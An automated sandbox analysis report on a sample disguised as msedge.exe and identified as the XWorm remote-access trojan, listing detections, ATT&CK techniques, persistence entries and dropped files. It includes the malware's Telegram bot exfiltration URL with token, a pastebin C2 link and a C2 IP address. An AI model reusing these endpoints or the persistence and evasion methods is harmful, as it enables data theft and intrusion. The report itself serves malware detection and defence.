                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\msedge.exeQueries volume information: C:\Users\user\AppData\Local\msedge.exe VolumeInformation
                    Source: C:\Users\user\Desktop\msedge.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: msedge.exe, 00000000.00000002.3374582006.000000001B74A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3380218892.000000001C3F0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3380218892.000000001C3FC000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000000.00000002.3373638320.000000001B670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\msedge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match | File source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara match | File source: msedge.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED

                    Remote Access Functionality

                    Source: Yara match | File source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara match | File source: msedge.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.msedge.exe.590000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.3362810960.0000000002982000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.3370050709.00000000128D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.2116705178.0000000000592000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: msedge.exe PID: 3840, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | 1 Input Capture | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                    Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 12 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Input Capture | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 1 Obfuscated Files or Information | Security Account Manager | 221 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 131 Virtualization/Sandbox Evasion | SSH | Keylogging | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 13 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 131 Virtualization/Sandbox Evasion | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Process Injection | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1487310 | Sample: msedge.exe | Startdate: 03/08/2024 | Architecture: WINDOWS | Score: 100
                    42 pastebin.com 2->42
                    44 api.telegram.org 2->44
                    52 Found malware configuration 2->52
                    54 Malicious sample detected (through community Yara rule) 2->54
                    56 Antivirus / Scanner detection for submitted sample 2->56
                    62 12 other signatures 2->62
                    8 msedge.exe 15 6 2->8 started
                    13 msedge.exe 2->13 started
                    15 msedge.exe 2->15 started
                    17 2 other processes 2->17
                    58 Connects to a pastebin service (likely for C&C) 42->58
                    60 Uses the Telegram API (likely for C&C communication) 44->60
                    46 api.telegram.org 149.154.167.220, 443, 49721 TELEGRAMRU United Kingdom 8->46
                    48 pastebin.com 104.20.3.235, 443, 49720 CLOUDFLARENETUS United States 8->48
                    50 213.219.149.161, 49722, 7000 EDPNETBE Belgium 8->50
                    38 C:\Users\user\AppData\Local\msedge.exe, PE32 8->38 dropped
                    66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->66
                    68 Protects its processes via BreakOnTermination flag 8->68
                    70 Bypasses PowerShell execution policy 8->70
                    78 2 other signatures 8->78
                    19 powershell.exe 23 8->19 started
                    22 powershell.exe 23 8->22 started
                    24 powershell.exe 23 8->24 started
                    26 2 other processes 8->26
                    40 C:\Users\user\AppData\...\msedge.exe.log, CSV 13->40 dropped
                    72 Antivirus detection for dropped file 13->72
                    74 Multi AV Scanner detection for dropped file 13->74
                    76 Machine Learning detection for dropped file 13->76
                    64 Loading BitLocker PowerShell Module 19->64
                    28 conhost.exe 19->28 started
                    30 conhost.exe 22->30 started
                    32 conhost.exe 24->32 started
                    34 conhost.exe 26->34 started
                    36 conhost.exe 26->36 started

                    Source | Detection | Scanner | Label
                    msedge.exe | 66% | Virustotal
                    msedge.exe | 100% | Avira | TR/Spy.Gen
                    msedge.exe | 100% | Joe Sandbox ML
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\msedge.exe | 100% | Avira | TR/Spy.Gen
                    C:\Users\user\AppData\Local\msedge.exe | 100% | Joe Sandbox ML
                    C:\Users\user\AppData\Local\msedge.exe | 71% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
                    C:\Users\user\AppData\Local\msedge.exe | 66% | Virustotal
                    No Antivirus matches
                    Source | Detection | Scanner | Label
                    api.telegram.org | 2% | Virustotal
                    pastebin.com | 0% | Virustotal
                    Source | Detection | Scanner | Label
                    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                    http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
                    http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe
                    https://contoso.com/License | 0% | URL Reputation | safe
                    http://crl.mic | 0% | URL Reputation | safe
                    https://contoso.com/Icon | 0% | URL Reputation | safe
                    http://schemas.micr | 0% | URL Reputation | safe
                    https://api.telegram.org | 0% | Avira URL Cloud | safe
                    http://crl.m | 0% | URL Reputation | safe
                    https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
                    http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
                    https://contoso.com/ | 0% | URL Reputation | safe
                    https://nuget.org/nuget.exe | 0% | URL Reputation | safe
                    https://aka.ms/pscore68 | 0% | URL Reputation | safe
                    http://www.micom/pkiops/Docs/ry.htm0 | 0% | Avira URL Cloud | safe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
                    http://www.microsoft.co | 0% | Avira URL Cloud | safe
                    http://micrLISTt.couS | 0% | Avira URL Cloud | safe
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=52790 | 0% | Avira URL Cloud | safe
                    https://api.telegram.org | 1% | Virustotal
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | 0% | Avira URL Cloud | safe
                    https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe
                    http://www.microsoft.co | 1% | Virustotal
                    https://github.com/Pester/Pester | 1% | Virustotal
                    https://api.telegram.org/bot | 1% | Virustotal
                    http://crl.mB | 0% | Avira URL Cloud | safe
                    http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe
                    https://pastebin.com | 0% | Avira URL Cloud | safe
                    https://pastebin.com/raw/RPPi3ByL | 0% | Avira URL Cloud | safe
                    https://pastebin.com | 0% | Virustotal
                    https://pastebin.com/raw/RPPi3ByL | 1% | Virustotal
                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.telegram.org | 149.154.167.220 | true | true | | unknown
                    pastebin.com | 104.20.3.235 | true | true | | unknown
                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A180E0A5D8868829B0C52%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K5GHF%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 | false | Avira URL Cloud: safe | unknown
                    https://pastebin.com/raw/RPPi3ByL | true | 1% Virustotal; Avira URL Cloud: safe | unknown
                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://api.telegram.org | msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmp | true | 1% Virustotal; Avira URL Cloud: safe | unknown
                    http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://api.telegram.org/bot | msedge.exe, msedge.exe.0.dr | true | 1% Virustotal; Avira URL Cloud: safe | unknown
                    http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000002.00000002.2209890780.0000020A21CDA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://www.microsoft.co | powershell.exe, 0000000D.00000002.2691169117.00000215ECAE0000.00000004.00000020.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
                    https://contoso.com/License | powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://crl.mic | powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://micrLISTt.couS | powershell.exe, 0000000D.00000002.2693896616.00000215ECD14000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://schemas.micr | powershell.exe, 00000005.00000002.2319002787.0000016F7D66C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=52790 | msedge.exe, 00000000.00000002.3362810960.0000000002925000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
                    https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
                    http://crl.m | powershell.exe, 00000005.00000002.2319654280.0000016F7D6B7000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2185819233.0000020A09A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580229000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://contoso.com/ | powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2203968122.0000020A19881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2294712290.0000016F10071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2445383429.0000026C1B7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2648967331.0000021590070000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://crl.micft.cMicRosof | powershell.exe, 0000000A.00000002.2471243355.0000026C23F78000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    http://crl.mB | powershell.exe, 0000000D.00000002.2697571611.00000215ECDC0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185819233.0000020A09811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2235325986.0000016F00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2352974812.0000026C0B741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2507022177.0000021580001000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                    https://pastebin.com | msedge.exe, 00000000.00000002.3362810960.00000000028D1000.00000004.00000800.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown
                    IP | Domain | Country | ASN | ASN Name | Malicious
                    104.20.3.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
                    213.219.149.161 | unknown | Belgium | 9031 | EDPNETBE | false
                    149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1487310
                    Start date and time:2024-08-03 20:09:15 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 53s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:msedge.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@20/21@2/3
                    EGA Information:
                    • Successful, ratio: 12.5%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 72
                    • Number of non-executed functions: 4
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target msedge.exe, PID 1512 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 3176 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 6648 because it is empty
                    • Execution Graph export aborted for target msedge.exe, PID 7048 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 2748 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 3172 because it is empty
                    • Execution Graph export aborted for target powershell.exe, PID 6968 because it is empty
• Not all processes were analyzed; report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
14:10:10 | API Interceptor | 50x Sleep call for process: powershell.exe modified
14:11:07 | API Interceptor | 208x Sleep call for process: msedge.exe modified
20:11:06 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
20:11:07 | Task Scheduler | Run new task: msedge path: C:\Users\user\AppData\Local\msedge.exe
20:11:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Local\msedge.exe
20:11:23 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
                                          Process:C:\Users\user\AppData\Local\msedge.exe
                                          File Type:CSV text
                                          Category:dropped
                                          Size (bytes):654
                                          Entropy (8bit):5.380476433908377
                                          Encrypted:false
                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                          MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                          SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                          SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                          SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                          Malicious:true
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................
                                          Process:C:\Users\user\Desktop\msedge.exe
                                          File Type:Generic INItialization configuration [WIN]
                                          Category:modified
                                          Size (bytes):58
                                          Entropy (8bit):3.598349098128234
                                          Encrypted:false
                                          SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                          MD5:5362ACB758D5B0134C33D457FCC002D9
                                          SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                          SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                          SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                          Malicious:false
                                          Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
